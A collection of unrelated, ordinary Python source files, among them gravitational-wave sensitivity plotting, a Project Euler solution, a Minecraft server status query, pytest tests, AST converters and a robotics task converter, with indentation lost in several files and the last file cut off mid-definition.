ax.loglog(np.array(bins_mean_point_ET)/6.5e14, binned_curve_ET[:len(bins_mean_point_ET)], linewidth='1.5', color=sns.xkcd_rgb["steel blue"], linestyle='--')
ax.loglog(np.array(bins_mean_point_muares_nofgs)/6.5e14, binned_curve_muares_nofgs[:len(bins_mean_point_muares_nofgs)], linewidth='1.5', color=sns.xkcd_rgb["cyan"], linestyle='--')
ax.loglog(np.array(bins_mean_point)/6.5e14, binned_curve[:len(bins_mean_point)], linewidth='1.5', color=sns.xkcd_rgb["black"], linestyle='--')
ax.loglog(np.array(bins_mean_point_flat_0001)/6.5e14, binned_curve_flat_0001[:len(bins_mean_point_flat_0001)], label='LiteBIRD r=0', linewidth='1.5', color=sns.xkcd_rgb["scarlet"], linestyle='-')
ax.loglog(np.array(bins_mean_point_AEDGE)/6.5e14, binned_curve_AEDGE[:len(bins_mean_point_AEDGE)], linewidth='1.5', color=sns.xkcd_rgb["pale red"], linestyle='--')
ax.loglog(np.array(bins_mean_point_SKA)/6.5e14, binned_curve_SKA[:len(bins_mean_point_SKA)], linewidth='1.5', color=sns.xkcd_rgb["violet"], linestyle='--')
ax.loglog(np.array(bins_mean_point_decigo_fgs)/6.5e14, binned_curve_decigo_fgs[:len(bins_mean_point_decigo_fgs)], label='DECIGO', linestyle='-', linewidth='1.5', color=sns.xkcd_rgb["amber"])
ax.loglog(np.array(bins_mean_point_decigo_spectral)/6.5e14, binned_curve_decigo_spectral[:len(bins_mean_point_decigo_spectral)], linestyle='-.', linewidth='1.5', color=sns.xkcd_rgb["amber"])
ax.loglog(np.array(bins_mean_point_DO_fgs)/6.5e14, binned_curve_DO_fgs[:len(bins_mean_point_DO_fgs)], label='DO Optimal', linestyle='-', linewidth='1.5', color=sns.xkcd_rgb["greyish"])
ax.loglog(np.array(bins_mean_point_DO_cons_fgs)/6.5e14, binned_curve_DO_cons_fgs[:len(bins_mean_point_DO_cons_fgs)],label='DO Conservative', linestyle='-', linewidth='1.5', color=sns.xkcd_rgb["faded green"])
ax.loglog(np.array(bins_mean_point_muares)/6.5e14, binned_curve_muares[:len(bins_mean_point_muares)], label=r'$\mu$Ares', linestyle='-', linewidth='1.5', color=sns.xkcd_rgb["cyan"])
ax.loglog(np.array(bins_mean_point_fgs)/6.5e14, binned_curve_fgs[:len(bins_mean_point_fgs)], label='LISA', linestyle='-', linewidth='1.5', color=sns.xkcd_rgb["black"])
ax.loglog(np.array(bins_mean_point_AEDGE_fgs)/6.5e14, binned_curve_AEDGE_fgs[:len(bins_mean_point_AEDGE_fgs)], label='AEDGE', linestyle='-', linewidth='1.5', color=sns.xkcd_rgb["pale red"])
ax.loglog(np.array(bins_mean_point_ET_fgs)/6.5e14, binned_curve_ET_fgs[:len(bins_mean_point_ET_fgs)], label='ET', linewidth='1.5', linestyle='-', color=sns.xkcd_rgb["steel blue"])
ax.loglog(np.array(bins_mean_point_SKA_fgs)/6.5e14, binned_curve_SKA_fgs[:len(bins_mean_point_SKA_fgs)], label='SKA', linewidth='1.5', linestyle='-', color=sns.xkcd_rgb["violet"])
ax.set_xlim([1e-19, 1e4])
ax.set_ylim([1e-19, 1e-6])
plt.xlabel(r'f $[Hz]$',fontsize = 10.0)
plt.ylabel(r'$h^{2} \Omega_{GW}$',fontsize = 10.0)
plt.tick_params(axis = 'both',which = 'major', labelsize = 10.0)
ax.legend(fontsize=8, bbox_to_anchor=(1, 1.0))
plt.savefig(op.join(op.dirname(__file__),'figures/Fig_8.pdf'), format='pdf', dpi=1000, bbox_inches='tight')
plt.show()
# saving binned Omega_gw h^2 curves as a function of frequency to .npz files
np.savez(op.join(op.dirname(__file__),'files/Binned_Omega_curves/Binned_Omega_DECIGO_nofgs.npz'), x=np.array(bins_mean_point_decigo)/6.5e14, y=binned_curve_decigo[:len(bins_mean_point_decigo)])
np.savez(op.join(op.dirname(__file__),'files/Binned_Omega_curves/Binned_Omega_DECIGO_fgs.npz'), x=np.array(bins_mean_point_decigo_fgs)/6.5e14, y=binned_curve_decigo_fgs[:len(bins_mean_point_decigo_fgs)])
np.savez(op.join(op.dirname(__file__),'files/Binned_Omega_curves/Binned_Omega_DECIGO_spectral.npz'), x=np.array(bins_mean_point_decigo_spectral)/6.5e14, y=binned_curve_decigo_spectral[:len(bins_mean_point_decigo_spectral)])
np.savez(op.join(op.dirname(__file__),'files/Binned_Omega_curves/Binned_Omega_LISA_nofgs.npz'), x=np.array(bins_mean_point)/6.5e14, y=binned_curve[:len(bins_mean_point)])
np.savez(op.join(op.dirname(__file__),'files/Binned_Omega_curves/Binned_Omega_LISA_fgs.npz'), x=np.array(bins_mean_point_fgs)/6.5e14, y=binned_curve_fgs[:len(bins_mean_point_fgs)])
np.savez(op.join(op.dirname(__file__),'files/Binned_Omega_curves/Binned_Omega_BBO_nofgs.npz'), x=np.array(bins_mean_point_BBO)/6.5e14, y=binned_curve_BBO[:len(bins_mean_point_BBO)])
np.savez(op.join(op.dirname(__file__),'files/Binned_Omega_curves/Binned_Omega_DO_Optimal_nofgs.npz'), x=np.array(bins_mean_point_DO)/6.5e14, y=binned_curve_DO[:len(bins_mean_point_DO)])
np.savez(op.join(op.dirname(__file__),'files/Binned_Omega_curves/Binned_Omega_DO_Optimal_fgs.npz'), x=np.array(bins_mean_point_DO_fgs)/6.5e14, y=binned_curve_DO_fgs[:len(bins_mean_point_DO_fgs)])
np.savez(op.join(op.dirname(__file__),'files/Binned_Omega_curves/Binned_Omega_DO_Conservative_nofgs.npz'), x=np.array(bins_mean_point_DO_cons)/6.5e14, y=binned_curve_DO_cons[:len(bins_mean_point_DO_cons)])
np.savez(op.join(op.dirname(__file__),'files/Binned_Omega_curves/Binned_Omega_DO_Conservative_fgs.npz'), x=np.array(bins_mean_point_DO_cons_fgs)/6.5e14, y=binned_curve_DO_cons_fgs[:len(bins_mean_point_DO_cons_fgs)])
np.savez(op.join(op.dirname(__file__),'files/Binned_Omega_curves/Binned_Omega_AEDGE_nofgs.npz'), x=np.array(bins_mean_point_AEDGE)/6.5e14, y=binned_curve_AEDGE[:len(bins_mean_point_AEDGE)])
np.savez(op.join(op.dirname(__file__),'files/Binned_Omega_curves/Binned_Omega_AEDGE_fgs.npz'), x=np.array(bins_mean_point_AEDGE_fgs)/6.5e14, y=binned_curve_AEDGE_fgs[:len(bins_mean_point_AEDGE_fgs)])
np.savez(op.join(op.dirname(__file__),'files/Binned_Omega_curves/Binned_Omega_muAres_nofgs.npz'), x=np.array(bins_mean_point_muares_nofgs)/6.5e14, y=binned_curve_muares_nofgs[:len(bins_mean_point_muares_nofgs)])
np.savez(op.join(op.dirname(__file__),'files/Binned_Omega_curves/Binned_Omega_muAres_fgs.npz'), x=np.array(bins_mean_point_muares)/6.5e14, y=binned_curve_muares[:len(bins_mean_point_muares)])
np.savez(op.join(op.dirname(__file__),'files/Binned_Omega_curves/Binned_Omega_SKA_nofgs.npz'), x=np.array(bins_mean_point_SKA)/6.5e14, y=binned_curve_SKA[:len(bins_mean_point_SKA)])
np.savez(op.join(op.dirname(__file__),'files/Binned_Omega_curves/Binned_Omega_SKA_fgs.npz'), x=np.array(bins_mean_point_SKA_fgs)/6.5e14, y=binned_curve_SKA_fgs[:len(bins_mean_point_SKA_fgs)])
np.savez(op.join(op.dirname(__file__),'files/Binned_Omega_curves/Binned_Omega_ET_nofgs.npz'), x=np.array(bins_mean_point_ET)/6.5e14, y=binned_curve_ET[:len(bins_mean_point_ET)])
np.savez(op.join(op.dirname(__file__),'files/Binned_Omega_curves/Binned_Omega_ET_fgs.npz'), x=np.array(bins_mean_point_ET_fgs)/6.5e14, y=binned_curve_ET_fgs[:len(bins_mean_point_ET_fgs)])
np.savez(op.join(op.dirname(__file__),'files/Binned_Omega_curves/Binned_Omega_LiteBIRD_fgs.npz'), x=np.array(bins_mean_point_flat_0001)/6.5e14, y=binned_curve_flat_0001[:len(bins_mean_point_flat_0001)])
np.savez(op.join(op.dirname(__file__),'files/Binned_Omega_curves/Binned_Omega_aLIGO.npz'), x=np.array(bins_mean_point_aLIGO)/6.5e14, y=binned_curve_aLIGO[:len(bins_mean_point_aLIGO)])
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
#
# A Solution to "Smallest multiple" – Project Euler Problem No. 5
# by Florian Buetow
#
# Sourcecode: https://github.com/fbcom/project-euler
# Problem statement: https://projecteuler.net/problem=5
#
def calc_smallest_multiple(numbers):
    # Returns the smallest positive number evenly divisible by every integer up to
    # 'numbers' (i.e. lcm(2..numbers)) by collecting, for each n, the factor it still lacks.
    factors = []
for n in range(2, numbers+1):
new_f = n
for f in factors:
if new_f % f == 0:
new_f = new_f / f
if new_f > 1:
factors.append(new_f)
return reduce(lambda product, factor: product * factor, factors)
assert (2520 == calc_smallest_multiple(10)), "Testcase failed."
print "Solution:", calc_smallest_multiple(20)
|
"""
Some old, example code
"""
from mcstatus import MinecraftServer
import click
from json import dumps as json_dumps
# If you know the host and port, you may skip this and use MinecraftServer("example.org", 1234)
server = MinecraftServer.lookup("example.com")
# 'status' is supported by all Minecraft servers that are version 1.7 or higher.
status = server.status()
print("The server has {0} players and replied in {1} ms".format(status.players.online, status.latency))
# 'ping' is supported by all Minecraft servers that are version 1.7 or higher.
# It is included in a 'status' call, but is exposed separately if you do not require the additional info.
latency = server.ping()
print("The server replied in {0} ms".format(latency))
# 'query' has to be enabled in a server's server.properties file.
# It may give more information than a ping, such as a full player list or mod information.
# from mcstatus.scripts.mcstatus import cli, json
# cli("ucsd.pocketmc.net")
data = {'online': False}
# Build data with responses and quit on exception
try:
ping_res = server.ping()
data['online'] = True
data['ping'] = ping_res
# status_res = server.status(retries=1)
status_res = status
data['version'] = status_res.version.name
data['protocol'] = status_res.version.protocol
data['motd'] = status_res.description
data['player_count'] = status_res.players.online
data['player_max'] = status_res.players.max
data['players'] = []
if status_res.players.sample is not None:
data['players'] = [{'name': player.name, 'id': player.id} for player in status_res.players.sample]
query_res = server.query(retries=1)
data['host_ip'] = query_res.raw['hostip']
data['host_port'] = query_res.raw['hostport']
data['map'] = query_res.map
data['plugins'] = query_res.software.plugins
except Exception:
pass
click.echo(json_dumps(data))
# query = json()
# print(query)
|
from schematics.types import StringType, EmailType
from schematics.models import Model
from .utils import BaseObject, BoolIntType
class Recipient(BaseObject):
validate_on_change = False
def __init__(self, name=None, email=None, **kwargs):
kwargs['name'] = name
kwargs['email'] = email
kwargs = self.clear_kwargs(kwargs)
self.__dict__['_model'] = RecipientModel(kwargs, strict=False)
if name and email:
self._model.validate()
class RecipientModel(Model):
name = StringType(required=True)
email = EmailType(required=True)
role = StringType()
message = StringType()
required = BoolIntType()
class Options:
serialize_when_none = False
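# Hedged usage sketch (comment only): constructing a recipient with both required
# fields triggers model validation immediately; the values below are hypothetical.
#
#   r = Recipient(name="Jane Doe", email="jane@example.com", role="signer")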
|
import os
import requests
import pygtrie as trie
from joblib import dump
from config import PUBLIC_SUFFIX_LIST_URL, SUFFIX_TRIE, DATA_DIR
def fetch_public_suffix_data():
data = []
try:
r = requests.get(PUBLIC_SUFFIX_LIST_URL, stream=True)
data = r.text.split("\n")
except Exception as e:
print("EXCEPTION IN FETCHING PUBLIC SUFFIX LIST : " + str(e))
return data
def create_public_suffix_trie():
pub_suf_trie = trie.StringTrie()
data = fetch_public_suffix_data()
if len(data) > 0:
for ps in data:
if ps != "" and not ps.startswith("//"):
pub_suf_trie[ps] = True
return pub_suf_trie
def dump_suffix_trie():
pub_suf_trie = create_public_suffix_trie()
try:
dump(pub_suf_trie, os.path.join(DATA_DIR, SUFFIX_TRIE))
except Exception as e:
print(e)
if __name__ == "__main__":
dump_suffix_trie()
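# Hedged usage sketch (comment only): reading the dumped trie back and checking
# whether a rule from the public suffix list is present:
#
#   from joblib import load
#   suffix_trie = load(os.path.join(DATA_DIR, SUFFIX_TRIE))
#   "co.uk" in suffix_trie   # True once the list has been fetched and dumped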
|
import numpy as np
def thinning_T(start, intensity, lambda_max, T):
    """Sample an inhomogeneous Poisson process on [start, T) by thinning.

    Candidate arrivals are drawn from a homogeneous process with rate lambda_max;
    a candidate at time t is kept with probability intensity(t) / lambda_max, so
    lambda_max must bound the intensity over the whole interval.
    """
n = 0
indicators = []
sample = []
next_arrival_time = start
while True:
next_arrival_time += np.random.exponential(scale=1.0 / lambda_max)
if next_arrival_time < T:
n += 1
d = np.random.rand()
lambda_s = intensity(next_arrival_time)
sample.append(next_arrival_time)
if d <= lambda_s / lambda_max:
indicators.append(True)
# n += 1
else:
indicators.append(False)
else:
break
return np.array(sample)[indicators]
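# Hedged usage sketch: thinning a sinusoidally modulated intensity on [0, 20).
# The bound lambda_max = 10 dominates the illustrative intensity everywhere.
if __name__ == '__main__':
    rate = lambda t: 5.0 * (1.0 + np.sin(t))
    events = thinning_T(start=0.0, intensity=rate, lambda_max=10.0, T=20.0)
    print(len(events), 'accepted arrivals')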
|
from taichi.core import tc_core as core
from taichi.dynamics import *
from taichi.geometry import *
from taichi.misc.util import Vector, Vectori
from taichi.scoping import *
from taichi.tools import *
from taichi.visual import *
from taichi.misc import *
from taichi.misc.task import Task
from taichi.misc import settings as settings
from taichi.misc.settings import *
import taichi.image as image
from taichi.tools.video import VideoManager
from taichi.tools.transform import *
from taichi.tools.file import *
from taichi.visual.particle_renderer import *
from taichi.dynamics.smoke3 import *
from taichi.system import *
from taichi.pakua import get_pakua_server
from taichi.main import main
__all__ = [s for s in dir() if not s.startswith('_')] + ['settings']
|
from PyQt5.QtWidgets import QWidget
from StockAnalysisSystem.interface.interface import SasInterface as sasIF
# ----------------------------------------------------------------------------------------------------------------------
def plugin_prob() -> dict:
return {
'plugin_id': 'e4b259f1-9d6a-498a-b0de-ce7c83d9938d',
'plugin_name': 'Dummy',
'plugin_version': '0.0.0.1',
'tags': ['Dummy', 'Test', 'Example', 'Sleepy'],
}
def plugin_adapt(method: str) -> bool:
return method in ['widget']
def plugin_capacities() -> list:
return []
# return [
# 'period',
# 'thread',
# 'widget',
# ]
# ----------------------------------------------------------------------------------------------------------------------
sasInterface: sasIF = None
def init(sas_if: sasIF) -> bool:
"""
System will invoke this function at startup once.
    :param sas_if: The instance of SasInterface (no matter whether local or remote)
:return: True if successful else False
"""
try:
global sasInterface
sasInterface = sas_if
except Exception as e:
pass
finally:
pass
return True
def period(interval_ns: int):
"""
    If you specify 'period' in plugin_capacities(), this function will be invoked periodically by the MAIN thread;
    the invocation interval is roughly 100 ms.
    Note that if this extension spends too much time in this function, the interface will be blocked
    and this extension will be removed from the running list.
:param interval_ns: The interval between previous invoking and now.
:return: None
"""
print('Period...' + str(interval_ns))
pass
def thread(context: dict):
"""
    If you specify 'thread' in plugin_capacities(), this function will be invoked in a separate thread.
    If this function returns or raises an uncaught exception, the thread is terminated and will not be restarted.
:param context: The context from StockAnalysisSystem, includes:
'quit_flag': bool - Process should be terminated and quit this function if it's True.
'?????????': any - TBD
:return: None
"""
print('Thread...')
pass
def widget(parent: QWidget, **kwargs) -> (QWidget, dict):
"""
    If you specify 'widget' in plugin_capacities(), this function will be invoked once at startup.
    You should create and return a widget together with its config as a dict.
:param parent: The parent widget to create your widget.
:return: A tuple includes a QWidget and a dict.
QWidget: The widget you want to embed in the main widget.
dict : The widget config in a dict.
'name': str - The name of this widget. Will be used as the title of its entry.
'show': bool - Show at startup if True, else False
"""
print('Widget...')
return None
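# Hedged illustration (not part of this dummy plugin): a plugin that actually provides
# the 'widget' capacity would build a QWidget and return it with its config, e.g.
#
#   def widget(parent: QWidget, **kwargs) -> (QWidget, dict):
#       from PyQt5.QtWidgets import QLabel
#       w = QLabel('Hello from plugin', parent)
#       return w, {'name': 'Dummy', 'show': False}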
|
import pytest
from core.controller import TypeController
from tests.test_utils import hass_mock
from core.type.switch_controller import SwitchController
@pytest.fixture
@pytest.mark.asyncio
async def sut(hass_mock, mocker):
c = SwitchController()
mocker.patch.object(TypeController, "initialize")
c.args = {"switch": "switch.test"}
await c.initialize()
return c
@pytest.mark.asyncio
async def test_initialize(sut):
await sut.initialize()
assert sut.switch == "switch.test"
@pytest.mark.asyncio
async def test_turn_on(sut, mocker):
called_service_patch = mocker.patch.object(sut, "call_service")
await sut.on()
called_service_patch.assert_called_once_with("switch/turn_on", entity_id=sut.switch)
@pytest.mark.asyncio
async def test_turn_off(sut, mocker):
called_service_patch = mocker.patch.object(sut, "call_service")
await sut.off()
called_service_patch.assert_called_once_with(
"switch/turn_off", entity_id=sut.switch
)
@pytest.mark.asyncio
async def test_toggle(sut, mocker):
called_service_patch = mocker.patch.object(sut, "call_service")
await sut.toggle()
called_service_patch.assert_called_once_with("switch/toggle", entity_id=sut.switch)
|
class Circle:
'''
circle object
'''
END = ' 0'
X = ' 10'
Y = ' 20'
Z = ' 30'
RADIUS = ' 40'
LAYER = ' 8'
# circle object takes in the dxf list and the line
# number where the circle entity can be found
def __init__(self, dxf, start_line):
# initialise x, y, z, radius and id attributes
self.x = self.y = self.z = self.radius = self.id = None
# set current line number to input line number
line = start_line
# iterate over every line within the entity
while dxf[line] != self.END:
# if layer name found set id to layer name
if dxf[line] == self.LAYER:
self.id = dxf[line + 1]
# if a coordinate is found set x, y, z values
if (dxf[line] == self.X and
dxf[line + 2] == self.Y and
dxf[line + 4] == self.Z):
self.x = float(dxf[line + 1])
self.y = float(dxf[line + 3])
self.z = float(dxf[line + 5])
# if radius is found set radius
if (dxf[line] == self.RADIUS):
self.radius = float(dxf[line + 1])
line += 1
def svg_shape(self, color):
'''
function takes in color and returns
svg circle shape with given color
'''
# template svg circle
svg = ('<circle id="{id}" cx="{cx}" cy="{cy}" r="{r}" ' +
'stroke="{stroke}" stroke-width="50" ' +
'fill="none" />\n')
# return svg circle
return svg.format(cx=self.x, cy=-self.y, r=self.radius,
stroke=color, id=self.id)
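# Hedged usage sketch: parse a minimal hand-written DXF-style token list (the exact
# layout is an assumption based on the parser above) and emit the SVG circle.
if __name__ == '__main__':
    sample_dxf = [' 8', 'HOLES',
                  ' 10', '1.0', ' 20', '2.0', ' 30', '0.0',
                  ' 40', '5.0',
                  ' 0']
    circle = Circle(sample_dxf, 0)
    print(circle.svg_shape('red'))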
|
from __future__ import absolute_import
from __future__ import print_function
from __future__ import division
def slice_(value, begins, ends, strides,
dtype=None, name=None, par=1,
value_ram_size=None, out_ram_size=None,
value_dtype=None):
slices = to_slices(begins, ends, strides)
return value[slices]
def to_slices(begins, ends, strides):
slices = []
for begin, end, stride in zip(begins, ends, strides):
slices.append(slice(begin, end, stride))
return tuple(slices)
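# Hedged usage sketch: slice_ just builds Python slice objects and indexes `value`
# with them, so any array-like supporting tuple indexing works (numpy is used here
# purely for illustration).
if __name__ == '__main__':
    import numpy as np
    a = np.arange(24).reshape(4, 6)
    # equivalent to a[1:3, 0:6:2]
    print(slice_(a, begins=(1, 0), ends=(3, 6), strides=(1, 2)))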
|
"""
This creates an index.html file for a version downloads dir on
the openmdao.org site.
"""
import sys
import os.path
import hashlib
def file_md5(fpath):
"""Return the MD5 digest for the given file"""
with open(fpath,'rb') as f:
m = hashlib.md5()
while True:
s = f.read(4096)
if not s:
break
m.update(s)
return m.hexdigest()
def make_index():
startdir = os.path.abspath(os.path.dirname(__file__))
out = open('index.html', 'w')
version = os.path.basename(os.path.dirname(os.path.abspath(__file__)))
out.write('<html>\n\n')
out.write('<head>\n')
out.write(' <title>OpenMDAO Version %s Downloads</title>\n' % version)
out.write(' <link rel="stylesheet" href="/chrome/common/css/trac.css" type="text/css" />\n')
out.write(' <div id="header">\n')
out.write(' <a id="logo" href="http://openmdao.org/">\n')
out.write(' <img src="/chrome/site/Feb2010_OpenMDAOLogo.png" alt="OpenMDAO Logo" height="93" width="334" />\n')
out.write(' </a>\n')
out.write(' </div>\n')
out.write('</head>\n\n')
out.write('<body>\n')
out.write(' <br><br><br>\n')
out.write(' <h1 class="blog-title" id="openmdao">\n')
out.write(' OpenMDAO Version %s Downloads\n' % version)
out.write(' </h1>\n')
out.write(' <ul>\n')
out.write(' <li><a href="..">..</a>\n')
files = []
dirs = []
for f in os.listdir(startdir):
if f in ['index.html', 'mkdlversionindex.py'] or f.startswith('openmdao_src'):
continue
if os.path.isfile(f):
files.append(f)
else:
dirs.append(f)
for d in dirs:
#lpath = os.path.join(url, 'downloads', version, d)
out.write(' <li><a href="%s">%s</a>\n' % (d, d))
for f in files:
#lpath = os.path.join(url, 'downloads', version, f)
checksum = file_md5(f)
out.write(' <li><a href="%s#md5=%s">%s</a>\n'%(f, checksum, f))
out.write(' </ul>\n')
out.write('</body>\n</html>')
out.close()
if __name__ == '__main__':
make_index()
|
from typing import Tuple
from torch.utils.data import Dataset
from .datasets import get_dataset
from .augmentor import ContrastiveAugmentor
from .base_dataset_wrapper import BaseDatasetWrapper
class UnsupervisedDatasetWrapper(BaseDatasetWrapper):
"""Dataset wrapper for unsupervised image classification"""
def __init__(self,
batch_size: int,
valid_size: float,
input_shape: Tuple[int, int, int],
dataset: str):
"""
Args:
batch_size: batch size to use in train and validation data loaders
valid_size: percentage of the data to be used in validation set. Should be in range (0, 1)
input_shape: input size of the image. Should be Tuple (H, W, C), H - height, W - width, C - channels
dataset: dataset to use. Available datasets are in SUPPORTED_DATASETS
"""
super().__init__(batch_size, valid_size, input_shape, dataset)
def get_dataset(self, dataset: str) -> Dataset:
data_augmentations = ContrastiveAugmentor(dataset, self._input_size)
return get_dataset(dataset, True, data_augmentations, True, True)
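# Hedged usage sketch (comment only): the dataset name is hypothetical and must be
# one of the datasets known to get_dataset():
#
#   wrapper = UnsupervisedDatasetWrapper(batch_size=256, valid_size=0.1,
#                                        input_shape=(32, 32, 3), dataset='cifar10')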
|
from gast.astn import AstToGAst, GAstToAst
import gast
import ast
import sys
class Ast3ToGAst(AstToGAst):
def visit_Name(self, node):
new_node = gast.Name(
self._visit(node.id),
self._visit(node.ctx),
None,
)
return ast.copy_location(new_node, node)
def visit_arg(self, node):
new_node = gast.Name(
self._visit(node.arg),
gast.Param(),
self._visit(node.annotation),
)
return ast.copy_location(new_node, node)
def visit_ExceptHandler(self, node):
if node.name:
new_node = gast.ExceptHandler(
self._visit(node.type),
gast.Name(node.name, gast.Store(), None),
self._visit(node.body))
return ast.copy_location(new_node, node)
else:
return self.generic_visit(node)
if sys.version_info.minor < 5:
def visit_Call(self, node):
if node.starargs:
star = gast.Starred(self._visit(node.starargs), gast.Load())
ast.copy_location(star, node)
starred = [star]
else:
starred = []
if node.kwargs:
kwargs = [gast.keyword(None, self._visit(node.kwargs))]
else:
kwargs = []
new_node = gast.Call(
self._visit(node.func),
self._visit(node.args) + starred,
self._visit(node.keywords) + kwargs,
)
ast.copy_location(new_node, node)
return new_node
if 2 <= sys.version_info.minor <= 3:
def _make_annotated_arg(self, parent, identifier, annotation):
if identifier is None:
return None
new_node = gast.Name(
self._visit(identifier),
gast.Param(),
self._visit(annotation),
)
return ast.copy_location(new_node, parent)
def visit_arguments(self, node):
new_node = gast.arguments(
[self._visit(n) for n in node.args],
self._make_annotated_arg(node,
node.vararg,
self._visit(node.varargannotation)),
[self._visit(n) for n in node.kwonlyargs],
self._visit(node.kw_defaults),
self._make_annotated_arg(node,
node.kwarg,
self._visit(node.kwargannotation)),
self._visit(node.defaults),
)
return new_node
if sys.version_info.minor < 6:
def visit_comprehension(self, node):
new_node = gast.comprehension(
target=self._visit(node.target),
iter=self._visit(node.iter),
ifs=self._visit(node.ifs),
is_async=0,
)
return ast.copy_location(new_node, node)
class GAstToAst3(GAstToAst):
def _make_arg(self, node):
if node is None:
return None
new_node = ast.arg(
self._visit(node.id),
self._visit(node.annotation),
)
return ast.copy_location(new_node, node)
def visit_Name(self, node):
new_node = ast.Name(
self._visit(node.id),
self._visit(node.ctx),
)
return ast.copy_location(new_node, node)
def visit_ExceptHandler(self, node):
if node.name:
new_node = ast.ExceptHandler(
self._visit(node.type),
node.name.id,
self._visit(node.body))
return ast.copy_location(new_node, node)
else:
return self.generic_visit(node)
if sys.version_info.minor < 5:
def visit_Call(self, node):
if node.args and isinstance(node.args[-1], gast.Starred):
args = node.args[:-1]
starargs = node.args[-1].value
else:
args = node.args
starargs = None
if node.keywords and node.keywords[-1].arg is None:
keywords = node.keywords[:-1]
kwargs = node.keywords[-1].value
else:
keywords = node.keywords
kwargs = None
new_node = ast.Call(
self._visit(node.func),
self._visit(args),
self._visit(keywords),
self._visit(starargs),
self._visit(kwargs),
)
ast.copy_location(new_node, node)
return new_node
def visit_ClassDef(self, node):
self.generic_visit(node)
new_node = ast.ClassDef(
name=self._visit(node.name),
bases=self._visit(node.bases),
keywords=self._visit(node.keywords),
body=self._visit(node.body),
decorator_list=self._visit(node.decorator_list),
starargs=None,
kwargs=None,
)
return ast.copy_location(new_node, node)
if 2 <= sys.version_info.minor <= 3:
def visit_arguments(self, node):
if node.vararg is None:
vararg = None
varargannotation = None
else:
vararg = node.vararg.id
varargannotation = self._visit(node.vararg.annotation)
if node.kwarg is None:
kwarg = None
kwargannotation = None
else:
kwarg = node.kwarg.id
kwargannotation = self._visit(node.kwarg.annotation)
new_node = ast.arguments(
[self._make_arg(n) for n in node.args],
vararg, varargannotation,
[self._make_arg(n) for n in node.kwonlyargs],
kwarg, kwargannotation,
self._visit(node.defaults),
self._visit(node.kw_defaults),
)
return new_node
else:
def visit_arguments(self, node):
new_node = ast.arguments(
[self._make_arg(n) for n in node.args],
self._make_arg(node.vararg),
[self._make_arg(n) for n in node.kwonlyargs],
self._visit(node.kw_defaults),
self._make_arg(node.kwarg),
self._visit(node.defaults),
)
return new_node
def ast_to_gast(node):
return Ast3ToGAst().visit(node)
def gast_to_ast(node):
return GAstToAst3().visit(node)
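# Hedged usage sketch (comment only): with a matching gast version installed, a
# Python 3 AST can be round-tripped through the converters defined above:
#
#   tree = ast.parse("x = 1")
#   g = ast_to_gast(tree)
#   back = gast_to_ast(g)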
|
from suii_protocol.task_protocol import TaskProtocol
from suii_mux_manager_comm.task_list import TaskList
from suii_protocol.protocol.enum_task_type import TaskType
from suii_mux_manager_comm.task import Task
## ===== RefBoxConverter ===== ##
# Converts from Refbox's ROS to our objects
class RefBoxConverter:
@staticmethod
def transportation_task_to_task(task):
source = TaskProtocol.look_up_value(TaskProtocol.location_dict, task.transportation_task.source.description.data)
if (source == -1):
print("Error look up for: %s" % task.transportation_task.source.description.data)
print("Please add to suii_protocol/protocol/enum_location_identifier")
print("And specify if you want instance ids generated in suii_protocol/task_protocol.py")
return None
destination = TaskProtocol.look_up_value(TaskProtocol.location_dict, task.transportation_task.destination.description.data)
if (destination == -1):
print("Error look up for: %s" % task.transportation_task.destination.description.data)
print("Please add to suii_protocol/protocol/enum_location_identifier")
print("And specify if you want instance ids generated in suii_protocol/task_protocol.py")
return None
object_to_pick = TaskProtocol.look_up_value(TaskProtocol.object_dict, task.transportation_task.object.description.data)
if (object_to_pick == -1):
print("Error look up for: %s" % task.transportation_task.object.description.data)
print("Please add to suii_protocol/protocol/enum_object_identifier")
return None
container = -1
if (task.transportation_task.container.description.data != ""):
container = TaskProtocol.look_up_value(TaskProtocol.container_dict, task.transportation_task.container.description.data)
if (container == -1):
print("Error look up for: %s" % task.transportation_task.container.description.data)
print("Please add to suii_protocol/protocol/enum_object_identifier")
return None
# create a new task
tmp_task = Task()
tmp_task.set_type(TaskProtocol.look_up_value(TaskProtocol.task_type_dict, TaskType.TRANSPORTATION.fullname))
tmp_task.set_source(source)
        # source == -1 was already rejected above, so the destination can be set directly
        tmp_task.set_destination(destination)
tmp_task.set_object(object_to_pick)
tmp_task.set_container(container)
return tmp_task
@staticmethod
def navigation_task_to_task(task):
dest_str = task.navigation_task.location.description.data
dest_str = dest_str.replace("Waypoint", "Way Point") # We don't use the same string for SOME reason :)
destination = TaskProtocol.look_up_value(TaskProtocol.location_dict, dest_str)
if (destination == -1):
print("Converter: Destination %s not found" % dest_str)
print("Please add to suii_protocol/protocol/enum_location_identifier")
print("And specify if you want instance ids generated in suii_protocol/task_protocol.py")
return None
tmp_task = Task()
tmp_task.set_type (TaskProtocol.look_up_value(TaskProtocol.task_type_dict, TaskType.NAVIGATION.fullname))
tmp_task.set_source(-1)
tmp_task.set_destination(destination)
tmp_task.set_object(-1)
tmp_task.set_container(-1)
tmp_task.set_orientation(task.navigation_task.orientation.data)
return tmp_task
@staticmethod
def navigation_task_list_to_task_list(nav_task_list):
result = TaskList()
for item in nav_task_list:
converted_task = RefBoxConverter.navigation_task_to_task(item)
result.task_list.append(converted_task)
return result
@staticmethod
def transportation_task_list_to_task_list(trans_task_list):
result = TaskList()
for item in trans_task_list:
converted_task = RefBoxConverter.transportation_task_to_task(item)
result.task_list.append(converted_task)
return result
@staticmethod
def ros_msg_to_task_list_object (msg):
tasks = msg.tasks
result = TaskList()
for task in tasks:
if task.type.data == int(TaskType.TRANSPORTATION):
result.task_list.append(RefBoxConverter.transportation_task_to_task(task))
elif task.type.data == int(TaskType.NAVIGATION):
result.task_list.append(RefBoxConverter.navigation_task_to_task(task))
else:
return None
return result
|
#!/usr/bin/env python
from manimlib.imports import *
from from_3b1b.old.clacks.question import BlocksAndWallExample
class NameBump(BlocksAndWallExample):
CONFIG = {
"name": "Grant Sanderson",
"sliding_blocks_config": {
"block1_config": {
"mass": 1e6,
"velocity": -0.5,
"distance": 7,
},
"block2_config": {},
},
"wait_time": 25,
}
def setup(self):
names = self.name.split(" ")
n = len(names)
if n == 1:
names = 2 * [names[0]]
elif n > 2:
names = [
" ".join(names[:n // 2]),
" ".join(names[n // 2:]),
]
# Swap, to show first name on the left
names = [names[1], names[0]]
name_mobs = VGroup(*map(TextMobject, names))
name_mobs.set_stroke(BLACK, 3, background=True)
name_mobs.set_fill(LIGHT_GREY, 1)
name_mobs.set_sheen(3, UL)
name_mobs.scale(2)
configs = [
